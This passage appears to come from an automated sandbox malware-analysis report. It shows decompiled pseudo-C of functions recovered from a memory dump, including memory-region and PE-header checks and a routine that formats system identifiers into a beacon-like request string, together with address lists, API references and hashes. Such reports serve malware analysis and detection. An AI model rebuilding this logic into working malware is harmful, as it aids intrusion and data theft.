						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x120a330; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x120a378 = 1;
										__eflags =  *0x120a378;
										if( *0x120a378 != 0) {
											goto L60;
										}
										_t84 =  *0x120a330; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x120a378 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x120a330 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x120a338 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x120a334 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x120a338 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x120a338 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x120a378 = 1;
							__eflags =  *0x120a378;
							if( *0x120a378 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x120a338 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x120a338 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x120a378 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x120a338 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x120a330 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x120a338 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x120a338 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                                        0x0120805f
                                                        0x01208062
                                                        0x01208068
                                                        0x01208086
                                                        0x00000000
                                                        0x01208086
                                                        0x01208070
                                                        0x01208079
                                                        0x0120807f
                                                        0x0120808e
                                                        0x01208091
                                                        0x01208094
                                                        0x0120809e
                                                        0x0120809e
                                                        0x012080a0
                                                        0x012080a3
                                                        0x012080a5
                                                        0x012080a5
                                                        0x012080a7
                                                        0x012080aa
                                                        0x00000000
                                                        0x00000000
                                                        0x012080ac
                                                        0x012080ae
                                                        0x01208114
                                                        0x01208114
                                                        0x01208272
                                                        0x00000000
                                                        0x01208272
                                                        0x012080b0
                                                        0x012080b0
                                                        0x012080b4
                                                        0x012080b6
                                                        0x012080b6
                                                        0x012080b6
                                                        0x012080b6
                                                        0x012080b9
                                                        0x012080ba
                                                        0x012080bd
                                                        0x012080bd
                                                        0x012080c1
                                                        0x012080c5
                                                        0x012080d3
                                                        0x012080d3
                                                        0x012080db
                                                        0x012080e1
                                                        0x012080e3
                                                        0x012080e5
                                                        0x012080f5
                                                        0x01208102
                                                        0x01208106
                                                        0x0120810b
                                                        0x0120810d
                                                        0x0120818b
                                                        0x0120818b
                                                        0x0120810f
                                                        0x0120810f
                                                        0x0120810f
                                                        0x0120818d
                                                        0x0120818f
                                                        0x01208270
                                                        0x01208270
                                                        0x00000000
                                                        0x01208195
                                                        0x01208195
                                                        0x0120819c
                                                        0x00000000
                                                        0x00000000
                                                        0x012081a2
                                                        0x012081a6
                                                        0x01208202
                                                        0x01208204
                                                        0x0120820c
                                                        0x0120820e
                                                        0x01208210
                                                        0x00000000
                                                        0x00000000
                                                        0x01208212
                                                        0x01208218
                                                        0x0120821a
                                                        0x0120821c
                                                        0x01208231
                                                        0x01208231
                                                        0x01208233
                                                        0x01208262
                                                        0x01208269
                                                        0x00000000
                                                        0x01208269
                                                        0x01208237
                                                        0x01208238
                                                        0x0120823a
                                                        0x0120823c
                                                        0x0120823c
                                                        0x0120823e
                                                        0x01208240
                                                        0x01208242
                                                        0x01208256
                                                        0x01208256
                                                        0x01208259
                                                        0x0120825b
                                                        0x0120825b
                                                        0x0120825c
                                                        0x0120825c
                                                        0x00000000
                                                        0x01208244
                                                        0x01208244
                                                        0x01208244
                                                        0x0120824d
                                                        0x0120824e
                                                        0x01208250
                                                        0x01208252
                                                        0x01208252
                                                        0x00000000
                                                        0x01208244
                                                        0x01208242
                                                        0x0120821e
                                                        0x01208225
                                                        0x01208225
                                                        0x01208227
                                                        0x00000000
                                                        0x00000000
                                                        0x01208229
                                                        0x0120822a
                                                        0x0120822d
                                                        0x0120822f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0120822f
                                                        0x00000000
                                                        0x01208225
                                                        0x012081a8
                                                        0x012081ab
                                                        0x012081b0
                                                        0x00000000
                                                        0x00000000
                                                        0x012081b9
                                                        0x012081bb
                                                        0x012081c1
                                                        0x00000000
                                                        0x00000000
                                                        0x012081c7
                                                        0x012081cd
                                                        0x00000000
                                                        0x00000000
                                                        0x012081d3
                                                        0x012081d5
                                                        0x012081de
                                                        0x012081e2
                                                        0x00000000
                                                        0x00000000
                                                        0x012081e8
                                                        0x012081eb
                                                        0x012081ed
                                                        0x00000000
                                                        0x00000000
                                                        0x012081f4
                                                        0x012081f6
                                                        0x00000000
                                                        0x00000000
                                                        0x012081f8
                                                        0x012081fc
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x012081fc
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x012080e7
                                                        0x012080e7
                                                        0x012080e7
                                                        0x012080ee
                                                        0x00000000
                                                        0x00000000
                                                        0x012080f0
                                                        0x012080f1
                                                        0x012080f3
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x012080f3
                                                        0x0120811b
                                                        0x0120811d
                                                        0x00000000
                                                        0x00000000
                                                        0x0120812d
                                                        0x0120812f
                                                        0x01208131
                                                        0x00000000
                                                        0x00000000
                                                        0x01208137
                                                        0x0120813e
                                                        0x0120816a
                                                        0x0120816a
                                                        0x0120816c
                                                        0x0120816e
                                                        0x01208182
                                                        0x01208184
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01208170
                                                        0x01208170
                                                        0x01208170
                                                        0x01208179
                                                        0x0120817a
                                                        0x0120817c
                                                        0x0120817e
                                                        0x0120817e
                                                        0x00000000
                                                        0x01208170
                                                        0x01208140
                                                        0x01208140
                                                        0x01208143
                                                        0x01208145
                                                        0x01208157
                                                        0x01208157
                                                        0x0120815a
                                                        0x0120815c
                                                        0x0120815c
                                                        0x0120815d
                                                        0x0120815d
                                                        0x01208163
                                                        0x01208163
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01208147
                                                        0x01208147
                                                        0x01208147
                                                        0x0120814e
                                                        0x00000000
                                                        0x00000000
                                                        0x01208150
                                                        0x01208150
                                                        0x01208151
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01208151
                                                        0x01208153
                                                        0x01208155
                                                        0x01208168
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01208168
                                                        0x00000000
                                                        0x01208155
                                                        0x012080c7
                                                        0x012080ca
                                                        0x012080cd
                                                        0x00000000
                                                        0x00000000
                                                        0x012080cf
                                                        0x012080d1
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x012080d1
                                                        0x01208096
                                                        0x01208098
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        APIs
                                                        • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 01208106
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: MemoryQueryVirtual
                                                        • String ID:
                                                        • API String ID: 2850889275-0
                                                        • Opcode ID: 3061c784f8016a43cbfd57c8c8849db8880e13bb9dd0cd84c6c181e3f0d5c56a
                                                        • Instruction ID: 8bcb3a2f437b5b428b7c35e9bd50fb799aeaf67cf568ff929fca9a98c2d4beb3
                                                        • Opcode Fuzzy Hash: 3061c784f8016a43cbfd57c8c8849db8880e13bb9dd0cd84c6c181e3f0d5c56a
                                                        • Instruction Fuzzy Hash: B461BE31E30A439FDB2BCB2DD48463B77A6EF85350B288729DA52C72C7E771D8428640
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01207E30, Relevance: .1, Instructions: 77COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 71%
                                                        			E01207E30(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E01207F9B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E01208055(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E01207F40(_t55, _t66);
										_t89 = _t66 + 0x10;
										E01207F9B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E01208037(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                                        0x01207e34
                                                        0x01207e35
                                                        0x01207e36
                                                        0x01207e39
                                                        0x01207e3b
                                                        0x01207e3e
                                                        0x01207e3f
                                                        0x01207e41
                                                        0x01207e42
                                                        0x01207e43
                                                        0x01207e46
                                                        0x01207e50
                                                        0x01207f01
                                                        0x01207f08
                                                        0x01207f11
                                                        0x01207e56
                                                        0x01207e56
                                                        0x01207e5c
                                                        0x01207e62
                                                        0x01207e65
                                                        0x01207e68
                                                        0x01207e6c
                                                        0x01207e71
                                                        0x01207e76
                                                        0x01207ef6
                                                        0x00000000
                                                        0x01207e78
                                                        0x01207e78
                                                        0x01207e84
                                                        0x01207e86
                                                        0x01207ee1
                                                        0x01207ee1
                                                        0x01207ee7
                                                        0x00000000
                                                        0x01207e88
                                                        0x01207e97
                                                        0x01207e99
                                                        0x01207e9a
                                                        0x01207e9b
                                                        0x01207e9e
                                                        0x01207e9e
                                                        0x01207ea0
                                                        0x00000000
                                                        0x01207ea2
                                                        0x01207ea2
                                                        0x01207eec
                                                        0x01207ea4
                                                        0x01207ea4
                                                        0x01207ea8
                                                        0x01207eb0
                                                        0x01207eb5
                                                        0x01207eba
                                                        0x01207ec6
                                                        0x01207ece
                                                        0x01207ed5
                                                        0x01207edb
                                                        0x01207edf
                                                        0x00000000
                                                        0x01207edf
                                                        0x01207ea2
                                                        0x01207ea0
                                                        0x00000000
                                                        0x01207e86
                                                        0x01207efa
                                                        0x01207efa
                                                        0x01207efa
                                                        0x01207e76
                                                        0x01207f16
                                                        0x01207f1d

                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                        • Instruction ID: 6ed9f7d458192765ac38e205a85fac06f8ed3f8f2c05022135ca6fe0e0f1d8c3
                                                        • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                        • Instruction Fuzzy Hash: 6B21B6729112059FDB11EF68C8C49ABBBA5FF44350B0586A8DE558B286D730FD15C7E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0120254C, Relevance: 33.3, APIs: 22, Instructions: 262memorystringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 77%
                                                        			E0120254C(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t88;
				void* _t91;
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t107;
				intOrPtr _t111;
				signed int _t115;
				char** _t117;
				int _t120;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr _t132;
				intOrPtr _t135;
				int _t138;
				intOrPtr _t139;
				int _t142;
				void* _t143;
				void* _t144;
				void* _t154;
				int _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				intOrPtr _t161;
				void* _t163;
				long _t167;
				intOrPtr* _t168;
				intOrPtr* _t171;
				void* _t172;
				void* _t174;
				void* _t175;
				void* _t180;

				_t154 = __edx;
				_t144 = __ecx;
				_t63 = __eax;
				_t143 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0x120a018; // 0x4ef75f3d
				asm("bswap eax");
				_t65 =  *0x120a014; // 0x5cb11ae7
				asm("bswap eax");
				_t66 =  *0x120a010; // 0x15dc9586
				asm("bswap eax");
				_t67 =  *0x120a00c; // 0x8e03bf7
				asm("bswap eax");
				_t68 =  *0x120a2d4; // 0x455d5a8
				_t3 = _t68 + 0x120b622; // 0x74666f73
				_t157 = wsprintfA(_t143, _t3, 3, 0x3d163, _t67, _t66, _t65, _t64,  *0x120a02c,  *0x120a004, _t63);
				_t71 = E01206A9F();
				_t72 =  *0x120a2d4; // 0x455d5a8
				_t4 = _t72 + 0x120b662; // 0x74707526
				_t75 = wsprintfA(_t157 + _t143, _t4, _t71);
				_t174 = _t172 + 0x38;
				_t158 = _t157 + _t75;
				if(_a8 != 0) {
					_t139 =  *0x120a2d4; // 0x455d5a8
					_t8 = _t139 + 0x120b66d; // 0x732526
					_t142 = wsprintfA(_t158 + _t143, _t8, _a8);
					_t174 = _t174 + 0xc;
					_t158 = _t158 + _t142;
				}
				_t76 = E01202C60(_t144);
				_t77 =  *0x120a2d4; // 0x455d5a8
				_t10 = _t77 + 0x120b38a; // 0x6d697426
				_t159 = _t158 + wsprintfA(_t158 + _t143, _t10, _t76, _t154);
				_t81 =  *0x120a2d4; // 0x455d5a8
				_t12 = _t81 + 0x120b7b4; // 0x5768d5c
				_t180 = _a4 - _t12;
				_t14 = _t81 + 0x120b33b; // 0x74636126
				_t156 = 0 | _t180 == 0x00000000;
				_t160 = _t159 + wsprintfA(_t159 + _t143, _t14, _t180 == 0);
				_t85 =  *0x120a31c; // 0x57695e0
				_t175 = _t174 + 0x1c;
				if(_t85 != 0) {
					_t135 =  *0x120a2d4; // 0x455d5a8
					_t18 = _t135 + 0x120b8e9; // 0x3d736f26
					_t138 = wsprintfA(_t160 + _t143, _t18, _t85);
					_t175 = _t175 + 0xc;
					_t160 = _t160 + _t138;
				}
				_t86 =  *0x120a32c; // 0x57695b0
				if(_t86 != 0) {
					_t132 =  *0x120a2d4; // 0x455d5a8
					_t20 = _t132 + 0x120b685; // 0x73797326
					wsprintfA(_t160 + _t143, _t20, _t86);
					_t175 = _t175 + 0xc;
				}
				_t161 =  *0x120a37c; // 0x5769630
				_t88 = E01203A66(0x120a00a, _t161 + 4);
				_t167 = 0;
				_v12 = _t88;
				if(_t88 == 0) {
					L28:
					HeapFree( *0x120a290, _t167, _t143);
					return _a20;
				} else {
					_t91 = RtlAllocateHeap( *0x120a290, 0, 0x800);
					_a8 = _t91;
					if(_t91 == 0) {
						L27:
						HeapFree( *0x120a290, _t167, _v12);
						goto L28;
					}
					E01202C46(GetTickCount());
					_t95 =  *0x120a37c; // 0x5769630
					__imp__(_t95 + 0x40);
					asm("lock xadd [eax], ecx");
					_t99 =  *0x120a37c; // 0x5769630
					__imp__(_t99 + 0x40);
					_t101 =  *0x120a37c; // 0x5769630
					_t163 = E01207156(1, _t156, _t143,  *_t101);
					_v20 = _t163;
					asm("lock xadd [eax], ecx");
					if(_t163 == 0) {
						L26:
						HeapFree( *0x120a290, _t167, _a8);
						goto L27;
					}
					StrTrimA(_t163, 0x12092ac);
					_push(_t163);
					_t107 = E01205C8D();
					_v8 = _t107;
					if(_t107 == 0) {
						L25:
						HeapFree( *0x120a290, _t167, _t163);
						goto L26;
					}
					 *_t163 = 0;
					__imp__(_a8, _v12);
					_t168 = __imp__;
					 *_t168(_a8, _v8);
					_t111 = E01203FC1( *_t168(_a8, _t163), _a8);
					_a4 = _t111;
					if(_t111 == 0) {
						_a20 = 8;
						L23:
						E01203546();
						L24:
						HeapFree( *0x120a290, 0, _v8);
						_t167 = 0;
						goto L25;
					}
					_t115 = E012058A0(_t143, 0xffffffffffffffff, _t163,  &_v16);
					_a20 = _t115;
					if(_t115 == 0) {
						_t171 = _v16;
						_a20 = E0120627E(_t171, _a4, _a12, _a16);
						_t123 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
						_t125 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t125 + 8))(_t125);
						_t127 =  *((intOrPtr*)(_t171 + 4));
						 *((intOrPtr*)( *_t127 + 8))(_t127);
						_t129 =  *_t171;
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						E012013CC(_t171);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t117 = _a12;
							if(_t117 != 0) {
								_t164 =  *_t117;
								_t169 =  *_a16;
								wcstombs( *_t117,  *_t117,  *_a16);
								_t120 = E012037F6(_t164, _t164, _t169 >> 1);
								_t163 = _v20;
								 *_a16 = _t120;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E012013CC(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}


























































                                                        0x0120254c
                                                        0x0120254c
                                                        0x0120254c
                                                        0x01202555
                                                        0x0120255a
                                                        0x01202561
                                                        0x01202563
                                                        0x01202563
                                                        0x01202570
                                                        0x0120257b
                                                        0x0120257e
                                                        0x01202589
                                                        0x0120258c
                                                        0x01202591
                                                        0x01202594
                                                        0x01202599
                                                        0x0120259c
                                                        0x012025a8
                                                        0x012025b5
                                                        0x012025b7
                                                        0x012025bd
                                                        0x012025c2
                                                        0x012025cd
                                                        0x012025cf
                                                        0x012025d2
                                                        0x012025d8
                                                        0x012025da
                                                        0x012025e2
                                                        0x012025ed
                                                        0x012025ef
                                                        0x012025f2
                                                        0x012025f2
                                                        0x012025f4
                                                        0x012025fb
                                                        0x01202600
                                                        0x0120260d
                                                        0x0120260f
                                                        0x01202614
                                                        0x0120261c
                                                        0x0120261f
                                                        0x01202625
                                                        0x01202630
                                                        0x01202632
                                                        0x01202637
                                                        0x0120263c
                                                        0x0120263f
                                                        0x01202644
                                                        0x0120264f
                                                        0x01202651
                                                        0x01202654
                                                        0x01202654
                                                        0x01202656
                                                        0x0120265d
                                                        0x01202660
                                                        0x01202665
                                                        0x0120266f
                                                        0x01202671
                                                        0x01202671
                                                        0x01202674
                                                        0x01202682
                                                        0x01202687
                                                        0x0120268b
                                                        0x0120268e
                                                        0x01202858
                                                        0x01202860
                                                        0x0120286d
                                                        0x01202694
                                                        0x012026a0
                                                        0x012026a8
                                                        0x012026ab
                                                        0x01202848
                                                        0x01202852
                                                        0x00000000
                                                        0x01202852
                                                        0x012026b7
                                                        0x012026bc
                                                        0x012026c5
                                                        0x012026d6
                                                        0x012026da
                                                        0x012026e3
                                                        0x012026e9
                                                        0x012026f6
                                                        0x012026fd
                                                        0x01202706
                                                        0x0120270c
                                                        0x01202838
                                                        0x01202842
                                                        0x00000000
                                                        0x01202842
                                                        0x01202718
                                                        0x0120271e
                                                        0x0120271f
                                                        0x01202726
                                                        0x01202729
                                                        0x0120282a
                                                        0x01202832
                                                        0x00000000
                                                        0x01202832
                                                        0x01202732
                                                        0x01202738
                                                        0x01202741
                                                        0x0120274a
                                                        0x01202755
                                                        0x0120275c
                                                        0x0120275f
                                                        0x01202870
                                                        0x01202812
                                                        0x01202812
                                                        0x01202817
                                                        0x01202822
                                                        0x01202828
                                                        0x00000000
                                                        0x01202828
                                                        0x01202769
                                                        0x01202770
                                                        0x01202773
                                                        0x01202778
                                                        0x01202788
                                                        0x0120278b
                                                        0x01202791
                                                        0x01202797
                                                        0x0120279d
                                                        0x012027a0
                                                        0x012027a6
                                                        0x012027a9
                                                        0x012027ae
                                                        0x012027b2
                                                        0x012027b2
                                                        0x012027be
                                                        0x012027ca
                                                        0x012027ce
                                                        0x012027d0
                                                        0x012027d5
                                                        0x012027d7
                                                        0x012027dc
                                                        0x012027e1
                                                        0x012027ee
                                                        0x012027f6
                                                        0x012027f9
                                                        0x012027f9
                                                        0x012027d5
                                                        0x00000000
                                                        0x012027c0
                                                        0x012027c4
                                                        0x012027fb
                                                        0x012027fe
                                                        0x01202807
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01202807
                                                        0x012027c6
                                                        0x00000000
                                                        0x012027c6
                                                        0x012027be

                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 01202563
                                                        • wsprintfA.USER32 ref: 012025B0
                                                        • wsprintfA.USER32 ref: 012025CD
                                                        • wsprintfA.USER32 ref: 012025ED
                                                        • wsprintfA.USER32 ref: 0120260B
                                                        • wsprintfA.USER32 ref: 0120262E
                                                        • wsprintfA.USER32 ref: 0120264F
                                                        • wsprintfA.USER32 ref: 0120266F
                                                        • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 012026A0
                                                        • GetTickCount.KERNEL32 ref: 012026B1
                                                        • RtlEnterCriticalSection.NTDLL(057695F0), ref: 012026C5
                                                        • RtlLeaveCriticalSection.NTDLL(057695F0), ref: 012026E3
                                                          • Part of subcall function 01207156: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,01204A9F,00000000,05769630), ref: 01207181
                                                          • Part of subcall function 01207156: lstrlen.KERNEL32(00000000,?,00000000,01204A9F,00000000,05769630), ref: 01207189
                                                          • Part of subcall function 01207156: strcpy.NTDLL ref: 012071A0
                                                          • Part of subcall function 01207156: lstrcat.KERNEL32(00000000,00000000), ref: 012071AB
                                                          • Part of subcall function 01207156: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,01204A9F,?,00000000,01204A9F,00000000,05769630), ref: 012071C8
                                                        • StrTrimA.SHLWAPI(00000000,012092AC,?,05769630), ref: 01202718
                                                          • Part of subcall function 01205C8D: lstrlen.KERNEL32(0576887A,00000000,00000000,00000000,01204AC6,00000000), ref: 01205C9D
                                                          • Part of subcall function 01205C8D: lstrlen.KERNEL32(?), ref: 01205CA5
                                                          • Part of subcall function 01205C8D: lstrcpy.KERNEL32(00000000,0576887A), ref: 01205CB9
                                                          • Part of subcall function 01205C8D: lstrcat.KERNEL32(00000000,?), ref: 01205CC4
                                                        • lstrcpy.KERNEL32(00000000,?), ref: 01202738
                                                        • lstrcat.KERNEL32(00000000,?), ref: 0120274A
                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 01202750
                                                          • Part of subcall function 01203FC1: lstrlen.KERNEL32(?,00000000,05769CD0,7742C740,012035B6,05769ED5,0120454B,0120454B,?,0120454B,?,69B25F44,E8FA7DD7,00000000), ref: 01203FC8
                                                          • Part of subcall function 01203FC1: mbstowcs.NTDLL ref: 01203FF1
